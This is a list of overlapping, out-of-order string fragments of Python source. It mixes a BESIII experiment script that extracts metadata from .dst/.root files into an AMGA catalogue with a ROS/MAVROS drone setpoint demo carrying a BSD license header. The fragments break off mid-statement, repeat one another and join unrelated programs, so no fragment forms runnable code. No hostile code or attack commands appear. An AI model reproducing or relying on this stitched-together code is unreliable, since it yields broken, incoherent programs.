"commoninfo #get bossVer,eventNum,dataType,fileSize,name,eventType,expNum, #resonance,runH,runL,status,streamId,description class DataAll(object): def __init__(self,dstfile,rootfile): self.dstfile = dstfile self.rootfile =",
"\"661:\",str(start - end) start = time.time() obj = DataAll(\"/bes3fs/offline/data/655-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst\",\"/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_655.root\") end = time.time() print",
"bossVer,runL,runH,eventNum by reading information from rootfile class Others(object): def __init__(self,dstfile,rootfile): self.dstfile = dstfile",
"{-\\d+(,-?\\d+)+}') res1 = pat.search(str1) if res1 is not None: #get a string like:RunIdList={-10513,0,-10629}",
"Others(object): def __init__(self,dstfile,rootfile): self.dstfile = dstfile self.rootfile = rootfile def getAttributes(self): #store all",
"%d,in jobOptions is %d\"%(self.dstfile,lfnInfo[\"runL\"],runL) return \"error\" #get streamId from filename attributes[\"streamId\"] = lfnInfo[\"streamId\"]",
"if getFileSize(self.dstfile)<5000: print \"Content of this file is null:\",self.dstfile return \"error\" else: attributes",
"end = time.time() print \"661:\",str(start - end) start = time.time() obj = DataAll(\"/bes3fs/offline/data/655-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst\",\"/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_655.root\")",
"#get streamId from filename attributes[\"streamId\"] = lfnInfo[\"streamId\"] #check eventType in filename evtType_exists =",
"= ROOT.num #get TotEvtNo #commoninfo[\"TotEvtNo\"] = list(i for i in ROOT.jobInfo.getTotEvtNo()) #get JobOption",
"#if runL is equal to runH,this file only has one runId if lfnInfo[\"runL\"]",
"in items: if i!='0': runid=abs(string.atoi(i)) runIdList.append(runid) result[\"runIdList\"] = runIdList return result #get Boss",
"= {} expRes = {} lfnInfo = {} runIds = [] #change the",
"result[\"runIdList\"] = runIdList return result #get Boss version, runid, Entry number, JobOptions from",
"filename is not stored in AMGA\"%(self.dstfile,lfnInfo[\"eventType\"]) return \"error\" #set values of attribute status",
"JudgeFormat(destformat) return #if this rootfile has exists,then delete it if os.path.exists(rootfile): os.unlink(rootfile) #create",
"list,it includes many formats def checkFormat(srcformat,file): flag = 0 #print \"file\",file for format",
"str return expRes #check whether eventType is stored in eventTypeList in amga def",
"\"Error %s:resonance in filename is %s,in ExpSearch is %s\"%(self.dstfile,lfnInfo[\"resonance\"],expRes[\"resonance\"]) return \"error\" else: print",
"is %s,in ExpSearch is %s\"%(self.dstfile,lfnInfo[\"resonance\"],expRes[\"resonance\"]) return \"error\" else: print \"Error %s:runH in filename",
"def changeFormat(dstfile,rootfile,srcformat=[\".dst\",\".tag\"],destformat=[\".root\"]): flag = checkFormat(srcformat,dstfile) if flag==0: raise JudgeFormat(srcformat) return flag = checkFormat(destformat,rootfile)",
"is null:\",self.dstfile return \"error\" else: attributes = getCommonInfo(rootfile) #get filesize by calling getFileSize",
"isn't in resonance List,add it to resList if result[4] not in resList: resList.append(result[4])",
"= client.getEntry()[1] #compare eventType with name of each entry if eventType == result[0]:",
"by \"/\",then get \"lfn.dst\" items=dstfile.split(\"/\") length=len(items) filename=items[length-1] #split \"*.dst\" by \".\" #get lfn",
"pat.search(str1) if res1 is not None: #get a string like:RunIdList={-10513,0,-10629} str2 = res1.group()",
"#get runIdList from JobOptions def getRunIdList(jobOptions): result = {} runIdList = [] str1=jobOptions[0]",
"is not None: return res.group() #Get expNum and resonance from ExpSearch according runids",
"gROOT from amga import mdclient,mdinterface import string import re import time #get number",
"#get file's size return os.path.getsize(dstfile) #lfn like resonance_eventType_streamId_runL_runH_*,get attributes:resonance,eventType,streamId,runL,runH #lfn like run_0009947_All_file001_SFO-1,get attribute",
"number behiend string \"exp\" def getNum(expNum): format = re.compile(r\"\\d+\") res = format.search(expNum) if",
"between runfrm and runto of each entry #under catalog \"/BES3/ExpSearch\" if runfrm<=runid<=runto: #if",
"filename is same as resonance that get from ExpSearch if expRes[\"resonance\"] == lfnInfo[\"resonance\"]:",
"client.getEntry()[0] if entries is None: print \"ExpSearch directory is empty, please run createBesDir",
"dst file def getFileSize(dstfile,format = [\".dst\",\".tag\"]): flag = checkFormat(format,dstfile) if flag==0: raise JudgeFormat(format)",
"value of Description is null attributes[\"status\"] = -1 attributes[\"streamId\"] = 'stream0' attributes[\"description\"] =",
"del attributes[\"runId\"] del attributes[\"jobOptions\"] return attributes if __name__==\"__main__\": import time start=time.time() obj =",
"#get Boss version, runid, Entry number, JobOptions from root file def getCommonInfo(rootfile): commoninfo",
"is %s\"%(self.dstfile,lfnInfo[\"resonance\"],expRes[\"resonance\"]) return \"error\" else: print \"Error %s:runH in filename is %d,in jobOptions",
"filename evtType_exists = eventTypeCheck(lfnInfo[\"eventType\"]) if evtType_exists == True: attributes[\"eventType\"] = lfnInfo[\"eventType\"] else: print",
"not stored in AMGA\"%(self.dstfile,lfnInfo[\"eventType\"]) return \"error\" #set values of attribute status #-1 <=>",
"if expRes == False: print \"Can't get expNum and resonance of this file\"",
"#for data/skim & mc, we use new file naming rule, #file name like",
"attributes[\"runId\"] del attributes[\"jobOptions\"] return attributes #get resonance,runL,runH,eventType,streamId,LFN from file name #file name like",
"checkFormat(destformat,rootfile) if flag==0: raise JudgeFormat(destformat) return #if this rootfile has exists,then delete it",
"= string.atoi(result[1]) runto = string.atoi(result[2]) for runid in runids: #check all runid whether",
"information from rootfile class Others(object): def __init__(self,dstfile,rootfile): self.dstfile = dstfile self.rootfile = rootfile",
"self.format = format def __str__(self): return repr(\"the File's format is not \",self.format) #type",
"== result[0]: return True return False #judge format of file class JudgeFormat(Exception): def",
"of each entry client.getattr(entry,['FILE']) result = client.getEntry()[1] #compare eventType with name of each",
"return runId else: result[\"resonance\"] = items[0] result[\"eventType\"] = items[1] result[\"streamId\"] = items[2] result[\"runL\"]",
"<=> value of Description is null attributes[\"status\"] = -1 attributes[\"streamId\"] = 'stream0' attributes[\"description\"]",
"getLFN function attributes[\"fileSize\"] = getFileSize(self.dstfile) attributes[\"LFN\"] = getLFN(self.dstfile) #for .dst files of Data/All,their",
"filename,runL = runH = %d,but runId in the root file is %d\"%(self.dstfile,lfnInfo[\"runL\"],attributes[\"runId\"]) return",
"print \"Error %s:runL in filename is %d,in jobOptions is %d\"%(self.dstfile,lfnInfo[\"runL\"],runL) return \"error\" #get",
"{} runIds = [] #change the .dst file to .root file rootfile =",
"dst file has several runIds,get them from JobOptions by calling getRunIdList function result",
"= expNumList[0] else: #if including several expNums,combine these expNum into mexpN1pN2p... sorted(expNumList) str",
"status is null #-1 <=> value of streamId is null #null <=> value",
"flag==0: raise JudgeFormat(format) return #split dstfile by \"/\",then get \"lfn.dst\" items=dstfile.split(\"/\") length=len(items) filename=items[length-1]",
"is %d,in jobOptions is %d\"%(self.dstfile,lfnInfo[\"runL\"],runL) return \"error\" #get streamId from filename attributes[\"streamId\"] =",
"os.path import ROOT from ROOT import gROOT from amga import mdclient,mdinterface import string",
"# author: linlei #for data/all name of file like run_0023454_All_file014_SFO-2.dst #for data/skim &",
"\"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"description\"] = \"null\" #if resonance in filename is same",
"result = {} runIdList = [] str1=jobOptions[0] pat = re.compile(r'RunIdList= {-\\d+(,-?\\d+)+}') res1 =",
"{} expRes = {} runIds = [] #change the .dst file to .root",
"'null' del attributes[\"runId\"] del attributes[\"jobOptions\"] return attributes #get resonance,runL,runH,eventType,streamId,LFN from file name #file",
"by calling getFileSize function #get name by calling getLFN function attributes[\"fileSize\"] = getFileSize(self.dstfile)",
"format in srcformat: #if format of file is in srcformat if file.endswith(format): flag",
"of file like run_0023454_All_file014_SFO-2.dst #for data/skim & mc, we use new file naming",
"ROOT.jobInfo.getTotEvtNo()) #get JobOption commoninfo[\"jobOptions\"] = list(i for i in ROOT.jobInfo.getJobOptions()) #set DataType commoninfo[\"dataType\"]='dst'",
"= re.compile(r\"\\d+\") res = format.search(expNum) if res is not None: return res.group() #Get",
"name by calling getLFN function attributes[\"fileSize\"] = getFileSize(self.dstfile) attributes[\"LFN\"] = getLFN(self.dstfile) #for .dst",
"resonance,runL,runH,eventType,streamId,LFN from file name #file name like resonance_eventType_streamId_runL_runH_*.dst #get bossVer,runL,runH,eventNum by reading information",
"attributes[\"jobOptions\"] return attributes #get resonance,runL,runH,eventType,streamId,LFN from file name #file name like resonance_eventType_streamId_runL_runH_*.dst #get",
"name of each entry if eventType == result[0]: return True return False #judge",
"whether between runfrm and runto of each entry #under catalog \"/BES3/ExpSearch\" if runfrm<=runid<=runto:",
"= getExpRes(runIds) if expRes == False: print \"Can't get expNum and resonance of",
"return \"error\" else: #this dst file has several runIds,get them from JobOptions by"
] |
[
"document_a, document_b = sorted((request.POST['doca'], request.POST['docb'])) do_deep = 'deep' in request.POST except KeyError: latest_comparisons",
"= sorted((request.POST['doca'], request.POST['docb'])) do_deep = 'deep' in request.POST except KeyError: latest_comparisons = get_latest_comparisons()",
"document_b=document_b) except Comparison.DoesNotExist: print(\"Comparing documents: \") if do_deep: with Lexicon.open(size=1000, nnz=8) as lex:",
"= 'deep' in request.POST except KeyError: latest_comparisons = get_latest_comparisons() return render(request, 'rivet/index.html', {",
"lexicon=lex, ingest=True) else: result = rivet.compare_documents(document_a, document_b) result = result[0][1] cmp = Comparison(document_a=document_a,",
"import Comparison from pyrivet_core.sqlite3_lexicon import Lexicon from pyrivet_core import rivet # Create your",
"*= 2.2 r = int(r * 100) return render(request, 'rivet/comparison.html', {'comparison': c, 'result':",
"do_deep: with Lexicon.open(size=1000, nnz=8) as lex: result = rivet.compare_documents(document_a, document_b, lexicon=lex, ingest=True) else:",
"HttpResponse from django.core.urlresolvers import reverse from .models import Comparison from pyrivet_core.sqlite3_lexicon import Lexicon",
"cmp = Comparison.objects.get(document_a=document_a, document_b=document_b) except Comparison.DoesNotExist: print(\"Comparing documents: \") if do_deep: with Lexicon.open(size=1000,",
"import rivet # Create your views here. def get_latest_comparisons(num=5): return Comparison.objects.order_by('id')[:num] def index(request):",
"ingest=True) else: result = rivet.compare_documents(document_a, document_b) result = result[0][1] cmp = Comparison(document_a=document_a, document_b=document_b,",
"Create your views here. def get_latest_comparisons(num=5): return Comparison.objects.order_by('id')[:num] def index(request): latest_comparisons = get_latest_comparisons()",
"comparison_id): c = get_object_or_404(Comparison, pk=comparison_id) r = c.result r -= 0.55 r *=",
"pyrivet_core import rivet # Create your views here. def get_latest_comparisons(num=5): return Comparison.objects.order_by('id')[:num] def",
"comparison(request, comparison_id): c = get_object_or_404(Comparison, pk=comparison_id) r = c.result r -= 0.55 r",
"result=result) cmp.save() return HttpResponseRedirect(reverse('comparison', args=(cmp.id,))) def comparison(request, comparison_id): c = get_object_or_404(Comparison, pk=comparison_id) r",
"try: document_a, document_b = sorted((request.POST['doca'], request.POST['docb'])) do_deep = 'deep' in request.POST except KeyError:",
"Comparison.objects.get(document_a=document_a, document_b=document_b) except Comparison.DoesNotExist: print(\"Comparing documents: \") if do_deep: with Lexicon.open(size=1000, nnz=8) as",
"def index(request): latest_comparisons = get_latest_comparisons() context = { 'latest_comparisons': latest_comparisons, } output =",
"def get_latest_comparisons(num=5): return Comparison.objects.order_by('id')[:num] def index(request): latest_comparisons = get_latest_comparisons() context = { 'latest_comparisons':",
"'error_message': \"Bad Input!\" }) else: try: cmp = Comparison.objects.get(document_a=document_a, document_b=document_b) except Comparison.DoesNotExist: print(\"Comparing",
"document_b, lexicon=lex, ingest=True) else: result = rivet.compare_documents(document_a, document_b) result = result[0][1] cmp =",
"<reponame>DruidGreeneyes/rivet_site<gh_stars>0 from django.shortcuts import render, get_object_or_404 from django.http import HttpResponseRedirect, HttpResponse from django.core.urlresolvers",
"document_b = sorted((request.POST['doca'], request.POST['docb'])) do_deep = 'deep' in request.POST except KeyError: latest_comparisons =",
"django.core.urlresolvers import reverse from .models import Comparison from pyrivet_core.sqlite3_lexicon import Lexicon from pyrivet_core",
"= { 'latest_comparisons': latest_comparisons, } output = render(request, 'rivet/index.html', context) return output def",
"Comparison from pyrivet_core.sqlite3_lexicon import Lexicon from pyrivet_core import rivet # Create your views",
"import render, get_object_or_404 from django.http import HttpResponseRedirect, HttpResponse from django.core.urlresolvers import reverse from",
"= render(request, 'rivet/index.html', context) return output def submit(request): try: document_a, document_b = sorted((request.POST['doca'],",
"if do_deep: with Lexicon.open(size=1000, nnz=8) as lex: result = rivet.compare_documents(document_a, document_b, lexicon=lex, ingest=True)",
"= Comparison.objects.get(document_a=document_a, document_b=document_b) except Comparison.DoesNotExist: print(\"Comparing documents: \") if do_deep: with Lexicon.open(size=1000, nnz=8)",
"= Comparison(document_a=document_a, document_b=document_b, result=result) cmp.save() return HttpResponseRedirect(reverse('comparison', args=(cmp.id,))) def comparison(request, comparison_id): c =",
"latest_comparisons, } output = render(request, 'rivet/index.html', context) return output def submit(request): try: document_a,",
"output = render(request, 'rivet/index.html', context) return output def submit(request): try: document_a, document_b =",
"django.http import HttpResponseRedirect, HttpResponse from django.core.urlresolvers import reverse from .models import Comparison from",
"else: result = rivet.compare_documents(document_a, document_b) result = result[0][1] cmp = Comparison(document_a=document_a, document_b=document_b, result=result)",
"rivet # Create your views here. def get_latest_comparisons(num=5): return Comparison.objects.order_by('id')[:num] def index(request): latest_comparisons",
"your views here. def get_latest_comparisons(num=5): return Comparison.objects.order_by('id')[:num] def index(request): latest_comparisons = get_latest_comparisons() context",
"'deep' in request.POST except KeyError: latest_comparisons = get_latest_comparisons() return render(request, 'rivet/index.html', { 'latest_comparisons':",
"as lex: result = rivet.compare_documents(document_a, document_b, lexicon=lex, ingest=True) else: result = rivet.compare_documents(document_a, document_b)",
"0.55 r *= 2.2 r = int(r * 100) return render(request, 'rivet/comparison.html', {'comparison':",
"= get_latest_comparisons() return render(request, 'rivet/index.html', { 'latest_comparisons': latest_comparisons, 'error_message': \"Bad Input!\" }) else:",
"index(request): latest_comparisons = get_latest_comparisons() context = { 'latest_comparisons': latest_comparisons, } output = render(request,",
"result = rivet.compare_documents(document_a, document_b) result = result[0][1] cmp = Comparison(document_a=document_a, document_b=document_b, result=result) cmp.save()",
"Comparison(document_a=document_a, document_b=document_b, result=result) cmp.save() return HttpResponseRedirect(reverse('comparison', args=(cmp.id,))) def comparison(request, comparison_id): c = get_object_or_404(Comparison,",
"return HttpResponseRedirect(reverse('comparison', args=(cmp.id,))) def comparison(request, comparison_id): c = get_object_or_404(Comparison, pk=comparison_id) r = c.result",
"nnz=8) as lex: result = rivet.compare_documents(document_a, document_b, lexicon=lex, ingest=True) else: result = rivet.compare_documents(document_a,",
"views here. def get_latest_comparisons(num=5): return Comparison.objects.order_by('id')[:num] def index(request): latest_comparisons = get_latest_comparisons() context =",
"= c.result r -= 0.55 r *= 2.2 r = int(r * 100)",
"submit(request): try: document_a, document_b = sorted((request.POST['doca'], request.POST['docb'])) do_deep = 'deep' in request.POST except",
"get_latest_comparisons() context = { 'latest_comparisons': latest_comparisons, } output = render(request, 'rivet/index.html', context) return",
"get_object_or_404(Comparison, pk=comparison_id) r = c.result r -= 0.55 r *= 2.2 r =",
"Lexicon from pyrivet_core import rivet # Create your views here. def get_latest_comparisons(num=5): return",
"get_object_or_404 from django.http import HttpResponseRedirect, HttpResponse from django.core.urlresolvers import reverse from .models import",
"return Comparison.objects.order_by('id')[:num] def index(request): latest_comparisons = get_latest_comparisons() context = { 'latest_comparisons': latest_comparisons, }",
"reverse from .models import Comparison from pyrivet_core.sqlite3_lexicon import Lexicon from pyrivet_core import rivet",
"Input!\" }) else: try: cmp = Comparison.objects.get(document_a=document_a, document_b=document_b) except Comparison.DoesNotExist: print(\"Comparing documents: \")",
"print(\"Comparing documents: \") if do_deep: with Lexicon.open(size=1000, nnz=8) as lex: result = rivet.compare_documents(document_a,",
"r -= 0.55 r *= 2.2 r = int(r * 100) return render(request,",
"r *= 2.2 r = int(r * 100) return render(request, 'rivet/comparison.html', {'comparison': c,",
"import reverse from .models import Comparison from pyrivet_core.sqlite3_lexicon import Lexicon from pyrivet_core import",
"'rivet/index.html', context) return output def submit(request): try: document_a, document_b = sorted((request.POST['doca'], request.POST['docb'])) do_deep",
"'latest_comparisons': latest_comparisons, } output = render(request, 'rivet/index.html', context) return output def submit(request): try:",
"= result[0][1] cmp = Comparison(document_a=document_a, document_b=document_b, result=result) cmp.save() return HttpResponseRedirect(reverse('comparison', args=(cmp.id,))) def comparison(request,",
"KeyError: latest_comparisons = get_latest_comparisons() return render(request, 'rivet/index.html', { 'latest_comparisons': latest_comparisons, 'error_message': \"Bad Input!\"",
"latest_comparisons, 'error_message': \"Bad Input!\" }) else: try: cmp = Comparison.objects.get(document_a=document_a, document_b=document_b) except Comparison.DoesNotExist:",
"context) return output def submit(request): try: document_a, document_b = sorted((request.POST['doca'], request.POST['docb'])) do_deep =",
"Comparison.DoesNotExist: print(\"Comparing documents: \") if do_deep: with Lexicon.open(size=1000, nnz=8) as lex: result =",
"= get_object_or_404(Comparison, pk=comparison_id) r = c.result r -= 0.55 r *= 2.2 r",
"def submit(request): try: document_a, document_b = sorted((request.POST['doca'], request.POST['docb'])) do_deep = 'deep' in request.POST",
"Lexicon.open(size=1000, nnz=8) as lex: result = rivet.compare_documents(document_a, document_b, lexicon=lex, ingest=True) else: result =",
"in request.POST except KeyError: latest_comparisons = get_latest_comparisons() return render(request, 'rivet/index.html', { 'latest_comparisons': latest_comparisons,",
"here. def get_latest_comparisons(num=5): return Comparison.objects.order_by('id')[:num] def index(request): latest_comparisons = get_latest_comparisons() context = {",
"cmp.save() return HttpResponseRedirect(reverse('comparison', args=(cmp.id,))) def comparison(request, comparison_id): c = get_object_or_404(Comparison, pk=comparison_id) r =",
"pyrivet_core.sqlite3_lexicon import Lexicon from pyrivet_core import rivet # Create your views here. def",
"\") if do_deep: with Lexicon.open(size=1000, nnz=8) as lex: result = rivet.compare_documents(document_a, document_b, lexicon=lex,",
".models import Comparison from pyrivet_core.sqlite3_lexicon import Lexicon from pyrivet_core import rivet # Create",
"render, get_object_or_404 from django.http import HttpResponseRedirect, HttpResponse from django.core.urlresolvers import reverse from .models",
"document_b) result = result[0][1] cmp = Comparison(document_a=document_a, document_b=document_b, result=result) cmp.save() return HttpResponseRedirect(reverse('comparison', args=(cmp.id,)))",
"request.POST['docb'])) do_deep = 'deep' in request.POST except KeyError: latest_comparisons = get_latest_comparisons() return render(request,",
"result = result[0][1] cmp = Comparison(document_a=document_a, document_b=document_b, result=result) cmp.save() return HttpResponseRedirect(reverse('comparison', args=(cmp.id,))) def",
"rivet.compare_documents(document_a, document_b, lexicon=lex, ingest=True) else: result = rivet.compare_documents(document_a, document_b) result = result[0][1] cmp",
"= rivet.compare_documents(document_a, document_b, lexicon=lex, ingest=True) else: result = rivet.compare_documents(document_a, document_b) result = result[0][1]",
"from pyrivet_core.sqlite3_lexicon import Lexicon from pyrivet_core import rivet # Create your views here.",
"latest_comparisons = get_latest_comparisons() return render(request, 'rivet/index.html', { 'latest_comparisons': latest_comparisons, 'error_message': \"Bad Input!\" })",
"= rivet.compare_documents(document_a, document_b) result = result[0][1] cmp = Comparison(document_a=document_a, document_b=document_b, result=result) cmp.save() return",
"= get_latest_comparisons() context = { 'latest_comparisons': latest_comparisons, } output = render(request, 'rivet/index.html', context)",
"document_b=document_b, result=result) cmp.save() return HttpResponseRedirect(reverse('comparison', args=(cmp.id,))) def comparison(request, comparison_id): c = get_object_or_404(Comparison, pk=comparison_id)",
"django.shortcuts import render, get_object_or_404 from django.http import HttpResponseRedirect, HttpResponse from django.core.urlresolvers import reverse",
"Comparison.objects.order_by('id')[:num] def index(request): latest_comparisons = get_latest_comparisons() context = { 'latest_comparisons': latest_comparisons, } output",
"try: cmp = Comparison.objects.get(document_a=document_a, document_b=document_b) except Comparison.DoesNotExist: print(\"Comparing documents: \") if do_deep: with",
"'rivet/index.html', { 'latest_comparisons': latest_comparisons, 'error_message': \"Bad Input!\" }) else: try: cmp = Comparison.objects.get(document_a=document_a,",
"from django.shortcuts import render, get_object_or_404 from django.http import HttpResponseRedirect, HttpResponse from django.core.urlresolvers import",
"result[0][1] cmp = Comparison(document_a=document_a, document_b=document_b, result=result) cmp.save() return HttpResponseRedirect(reverse('comparison', args=(cmp.id,))) def comparison(request, comparison_id):",
"}) else: try: cmp = Comparison.objects.get(document_a=document_a, document_b=document_b) except Comparison.DoesNotExist: print(\"Comparing documents: \") if",
"get_latest_comparisons() return render(request, 'rivet/index.html', { 'latest_comparisons': latest_comparisons, 'error_message': \"Bad Input!\" }) else: try:",
"def comparison(request, comparison_id): c = get_object_or_404(Comparison, pk=comparison_id) r = c.result r -= 0.55",
"request.POST except KeyError: latest_comparisons = get_latest_comparisons() return render(request, 'rivet/index.html', { 'latest_comparisons': latest_comparisons, 'error_message':",
"2.2 r = int(r * 100) return render(request, 'rivet/comparison.html', {'comparison': c, 'result': r})",
"\"Bad Input!\" }) else: try: cmp = Comparison.objects.get(document_a=document_a, document_b=document_b) except Comparison.DoesNotExist: print(\"Comparing documents:",
"r = c.result r -= 0.55 r *= 2.2 r = int(r *",
"else: try: cmp = Comparison.objects.get(document_a=document_a, document_b=document_b) except Comparison.DoesNotExist: print(\"Comparing documents: \") if do_deep:",
"-= 0.55 r *= 2.2 r = int(r * 100) return render(request, 'rivet/comparison.html',",
"# Create your views here. def get_latest_comparisons(num=5): return Comparison.objects.order_by('id')[:num] def index(request): latest_comparisons =",
"import HttpResponseRedirect, HttpResponse from django.core.urlresolvers import reverse from .models import Comparison from pyrivet_core.sqlite3_lexicon",
"{ 'latest_comparisons': latest_comparisons, } output = render(request, 'rivet/index.html', context) return output def submit(request):",
"from pyrivet_core import rivet # Create your views here. def get_latest_comparisons(num=5): return Comparison.objects.order_by('id')[:num]",
"c = get_object_or_404(Comparison, pk=comparison_id) r = c.result r -= 0.55 r *= 2.2",
"context = { 'latest_comparisons': latest_comparisons, } output = render(request, 'rivet/index.html', context) return output",
"HttpResponseRedirect, HttpResponse from django.core.urlresolvers import reverse from .models import Comparison from pyrivet_core.sqlite3_lexicon import",
"render(request, 'rivet/index.html', { 'latest_comparisons': latest_comparisons, 'error_message': \"Bad Input!\" }) else: try: cmp =",
"from django.core.urlresolvers import reverse from .models import Comparison from pyrivet_core.sqlite3_lexicon import Lexicon from",
"get_latest_comparisons(num=5): return Comparison.objects.order_by('id')[:num] def index(request): latest_comparisons = get_latest_comparisons() context = { 'latest_comparisons': latest_comparisons,",
"except KeyError: latest_comparisons = get_latest_comparisons() return render(request, 'rivet/index.html', { 'latest_comparisons': latest_comparisons, 'error_message': \"Bad",
"lex: result = rivet.compare_documents(document_a, document_b, lexicon=lex, ingest=True) else: result = rivet.compare_documents(document_a, document_b) result",
"latest_comparisons = get_latest_comparisons() context = { 'latest_comparisons': latest_comparisons, } output = render(request, 'rivet/index.html',",
"pk=comparison_id) r = c.result r -= 0.55 r *= 2.2 r = int(r",
"from django.http import HttpResponseRedirect, HttpResponse from django.core.urlresolvers import reverse from .models import Comparison",
"with Lexicon.open(size=1000, nnz=8) as lex: result = rivet.compare_documents(document_a, document_b, lexicon=lex, ingest=True) else: result",
"except Comparison.DoesNotExist: print(\"Comparing documents: \") if do_deep: with Lexicon.open(size=1000, nnz=8) as lex: result",
"return render(request, 'rivet/index.html', { 'latest_comparisons': latest_comparisons, 'error_message': \"Bad Input!\" }) else: try: cmp",
"'latest_comparisons': latest_comparisons, 'error_message': \"Bad Input!\" }) else: try: cmp = Comparison.objects.get(document_a=document_a, document_b=document_b) except",
"return output def submit(request): try: document_a, document_b = sorted((request.POST['doca'], request.POST['docb'])) do_deep = 'deep'",
"do_deep = 'deep' in request.POST except KeyError: latest_comparisons = get_latest_comparisons() return render(request, 'rivet/index.html',",
"{ 'latest_comparisons': latest_comparisons, 'error_message': \"Bad Input!\" }) else: try: cmp = Comparison.objects.get(document_a=document_a, document_b=document_b)",
"c.result r -= 0.55 r *= 2.2 r = int(r * 100) return",
"cmp = Comparison(document_a=document_a, document_b=document_b, result=result) cmp.save() return HttpResponseRedirect(reverse('comparison', args=(cmp.id,))) def comparison(request, comparison_id): c",
"rivet.compare_documents(document_a, document_b) result = result[0][1] cmp = Comparison(document_a=document_a, document_b=document_b, result=result) cmp.save() return HttpResponseRedirect(reverse('comparison',",
"} output = render(request, 'rivet/index.html', context) return output def submit(request): try: document_a, document_b",
"import Lexicon from pyrivet_core import rivet # Create your views here. def get_latest_comparisons(num=5):",
"from .models import Comparison from pyrivet_core.sqlite3_lexicon import Lexicon from pyrivet_core import rivet #",
"args=(cmp.id,))) def comparison(request, comparison_id): c = get_object_or_404(Comparison, pk=comparison_id) r = c.result r -=",
"render(request, 'rivet/index.html', context) return output def submit(request): try: document_a, document_b = sorted((request.POST['doca'], request.POST['docb']))",
"sorted((request.POST['doca'], request.POST['docb'])) do_deep = 'deep' in request.POST except KeyError: latest_comparisons = get_latest_comparisons() return",
"result = rivet.compare_documents(document_a, document_b, lexicon=lex, ingest=True) else: result = rivet.compare_documents(document_a, document_b) result =",
"documents: \") if do_deep: with Lexicon.open(size=1000, nnz=8) as lex: result = rivet.compare_documents(document_a, document_b,",
"output def submit(request): try: document_a, document_b = sorted((request.POST['doca'], request.POST['docb'])) do_deep = 'deep' in",
"HttpResponseRedirect(reverse('comparison', args=(cmp.id,))) def comparison(request, comparison_id): c = get_object_or_404(Comparison, pk=comparison_id) r = c.result r"
] |
[
"Redistributions in binary form must reproduce the above copyright # * notice, this",
"# * # **************************************************************************** import rospy import thread import threading import time from",
"0 while not rospy.is_shutdown(): x = radius * cos(i*2*pi/sides) + offset_x y =",
"et: # # # **************************************************************************** # * # * Copyright (c) 2015 UAVenture",
"THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # * LIABILITY, OR TORT (INCLUDING",
"std_msgs.msg import Header from std_msgs.msg import String from tf.transformations import quaternion_from_euler class Setpoint:",
"rospy.Rate(5) while not self.done: rate.sleep() time.sleep(delay) def reached(self, topic): #print topic.pose.position.z, self.z, abs(topic.pose.position.z",
"offset_y z = offset_z wait = False delay = 0 if (i ==",
"of conditions and the following disclaimer. # * 2. Redistributions in binary form",
"< 0.5 and abs(topic.pose.position.y - self.y) < 0.5 and abs(topic.pose.position.z - self.z) <",
"# * \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT",
"IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # * FOR A PARTICULAR PURPOSE ARE",
"from geometry_msgs.msg import PoseStamped, Quaternion from math import * from mavros.srv import CommandBool",
"without # * modification, are permitted provided that the following conditions # *",
"# * POSSIBILITY OF SUCH DAMAGE. # * # **************************************************************************** import rospy import",
"radians(yaw_degrees) quaternion = quaternion_from_euler(0, 0, yaw) msg.pose.orientation = Quaternion(*quaternion) self.pub.publish(msg) rate.sleep() def set(self,",
"= pub self.rospy = rospy self.x = 0.0 self.y = 0.0 self.z =",
"0.0, 8.0, 5) print \"Fly to the right\" setpoint.set(10.0, 4.0, 8.0, 5) print",
"= x self.y = y self.z = z if wait: rate = rospy.Rate(5)",
"rate.sleep() time.sleep(delay) def reached(self, topic): #print topic.pose.position.z, self.z, abs(topic.pose.position.z - self.z) if abs(topic.pose.position.x",
"BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS # *",
"ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # * LIABILITY, OR TORT",
"Header from std_msgs.msg import String from tf.transformations import quaternion_from_euler class Setpoint: def __init__(self,",
"IN # * ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN",
"y self.z = z if wait: rate = rospy.Rate(5) while not self.done: rate.sleep()",
"self.done: rate.sleep() time.sleep(delay) def reached(self, topic): #print topic.pose.position.z, self.z, abs(topic.pose.position.z - self.z) if",
"For demo purposes we will lock yaw/heading to north. yaw_degrees = 0 #",
"AG. All rights reserved. # * Author: <NAME> <<EMAIL>> # * # *",
"0.0 try: thread.start_new_thread( self.navigate, () ) except: print \"Error: Unable to start thread\"",
"contributors may be # * used to endorse or promote products derived from",
"- self.z) < 0.5: self.done = True self.done_evt.set() def setpoint_demo(): pub = rospy.Publisher('/mavros/setpoint_position/local',",
"queue_size=10) rospy.init_node('pose', anonymous=True) rate = rospy.Rate(10) setpoint = Setpoint(pub, rospy) print \"Climb\" setpoint.set(0.0,",
"print \"Sink\" setpoint.set(0.0, 0.0, 8.0, 5) print \"Fly to the right\" setpoint.set(10.0, 4.0,",
"= 0.0 offset_z = 10.0 sides = 360 radius = 20 print \"Fly",
"* Redistribution and use in source and binary forms, with or without #",
"it reach the setpoint. wait = True delay = 5 setpoint.set(x, y, z,",
"IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # * \"AS IS\" AND",
"offset_x = 0.0 offset_y = 0.0 offset_z = 10.0 sides = 360 radius",
"lock yaw/heading to north. yaw_degrees = 0 # North yaw = radians(yaw_degrees) quaternion",
"ANY DIRECT, INDIRECT, # * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, #",
"* notice, this list of conditions and the following disclaimer in # *",
"setpoint.set(10.0, 4.0, 8.0, 5) print \"Fly to the left\" setpoint.set(0.0, 0.0, 8.0, 5)",
"setpoint.set(0.0, 0.0, 8.0, 5) setpoint.set(0.0, 0.0, 3.0, 5) setpoint.set(0.0, 0.0, 2.0, 2) setpoint.set(0.0,",
"True delay = 5 setpoint.set(x, y, z, delay, wait) i = i +",
"NEGLIGENCE OR OTHERWISE) ARISING IN # * ANY WAY OUT OF THE USE",
"import time from geometry_msgs.msg import PoseStamped, Quaternion from math import * from mavros.srv",
